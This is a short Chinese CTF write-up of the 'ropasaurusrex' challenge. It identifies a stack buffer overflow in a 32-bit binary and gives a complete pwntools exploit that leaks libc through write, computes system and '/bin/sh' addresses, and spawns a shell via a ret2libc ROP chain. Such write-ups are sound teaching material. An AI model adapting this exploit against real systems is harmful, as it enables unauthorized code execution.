32位动态链接ELF文件,no RELRO,no canary,no PIE
查看main函数
ssize_t __cdecl main() { sub_80483F4(); return write(1, "WIN\n", 4u); }
查看sub_80483F4
ssize_t sub_80483F4() { char buf[136]; // [esp+10h] [ebp-88h] BYREF return read(0, buf, 0x100u); }
非常明显的栈溢出,题目中有read和write函数
因此首先先通过write函数泄露read函数的地址,然后重新运行程序,构造rop链获得shell
exp如下
from pwn import * io = process(‘./ropasaurusrex‘) elf = ELF(‘./ropasaurusrex‘) libc = elf.libc #libc = ELF(‘./libc.so.6‘) write_plt = 0x804830C read_got = 0x804961C read_plt = 0x804832C main_addr = 0x804841D goal_addr = 0x8049700 payload = b‘a‘ * 0x8c + p32(write_plt) + p32(main_addr) payload += p32(1) + p32(read_got) + p32(4) io.send(payload) read_addr = u32(io.recv(4)) info(‘read_addr: 0x%x‘ % read_addr) libc_base = read_addr - libc.symbols[‘read‘] info(‘libc_base: 0x%x‘ % libc_base) system_addr = libc_base + libc.symbols[‘system‘] info(‘system_addr: 0x%x‘ % system_addr) binsh_addr = libc_base + next(libc.search(b‘/bin/sh‘)) info(‘binsh_addr: 0x%x‘ % binsh_addr) payload = b‘a‘ * 0x8c + p32(system_addr) + p32(main_addr) + p32(binsh_addr) io.send(payload) io.interactive()